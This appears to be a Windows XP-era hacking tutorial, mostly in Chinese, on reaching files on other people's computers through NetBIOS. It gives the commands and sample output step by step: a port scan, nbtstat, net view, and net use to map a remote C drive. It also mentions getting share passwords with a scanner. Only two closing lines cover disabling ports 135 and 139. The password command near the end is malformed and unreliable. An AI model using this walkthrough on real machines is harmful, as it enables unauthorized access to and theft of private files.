利用NetBIOS浏览他人电脑中的资料

NetBIOS （Network basic input output system）即网络基本输入输出系统。它在Windows系统中用于文件和打印机共享。

1. NetBIOS

To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:
要远程使用NetBIOS，目标计算机必须运行该服务并未对之实施保护。可以打开端口扫描器进行扫描：
25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn

如果结果如上，恭喜...

2. nbtstat

我们可以使用nbtstat获得攻击所需信息。打开WinXP的控制台或早期Windows版本的命令行。


输入命令:
-----------------------------------------------------------
c:\\>nbtstat -A 127.0.0.1
-----------------------------------------------------------

如果使用IP地址就使用-A，使用主机名则使用-a.

运行后将获得如下信息：

code:-------------------------------------------------------
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered

MAC Address = xx-xx-xx-xx-xx-xx
----------------------------------------------------


下面这一行
-----------------------------------------------------
computername <20> UNIQUE Registered
--------------------------------------

很有用，因为<20>表示文件共享已经启用了。 那就意味着我们可以尝试连接到该电脑。
首先，我们需要知道硬盘名称等信息，并且我们还需要知道它是否安装的是XP以及有没有开放文件共享。可以使用命令：
net view \\\\ipaddress来完成。

输入:
----------------------------------------------------------
C:\\>net view \\\\127.0.0.1
Shared resources at \\\\xxx.xxx.xxx.xxx
Share name Type Used as Comment

-----------------------------------
SharedDocs Disk
The command completed successfully.
--------------------------------------------------------


应该获得如上显示信息 (在非XP系统中会有所不同).

该做点有趣的事情了: 如果想要像使用本地计算机一样使用和浏览该电脑，我们可以使用net use。格式如下：
net use letter: \\\\ipaddress\\name

输入:
-----------------------------------------------------------
c:\\>net use g: \\\\127.0.0.1\\SharedDocs
The command completed successfully.
c:\\>net use h: \\\\127.0.0.1\\C
The command completed successfully.
-------------------------------------------------------


现在目标计算机的硬盘已映射为我们刚刚指定的盘符。（确保这一盘符不与本地电脑已使用盘符冲突）完成后就可以如同浏览本地电脑一样进行浏览 ：

输入:
------------------------------------------------
c:\\>cd g:
g:\\>
---------------------------------------------


在windows XP中，可以直接打开“我的电脑”，在图形界面下浏览刚刚添加的映射盘.

完成后，记得要从机器中删除映射盘。

输入:
--------------------------------------------------------
c:\\>net use /delete g:
g: was deleted successfully.
----------------------------------------------------


有些系统需要密码才可以进入 (win2k, WinNT): （可以通过扫描器扫描）
获得密码后可使用如下命令进入:


--------------------------------------------------------------
net use password \\\\ip\\sharename
---------------------------------------------------------------

怎么关掉NETBIOS？
在防火墙里关掉135　139端口应该就可以了。

不过这样就不能在局域网内共享了。

所以有弊端。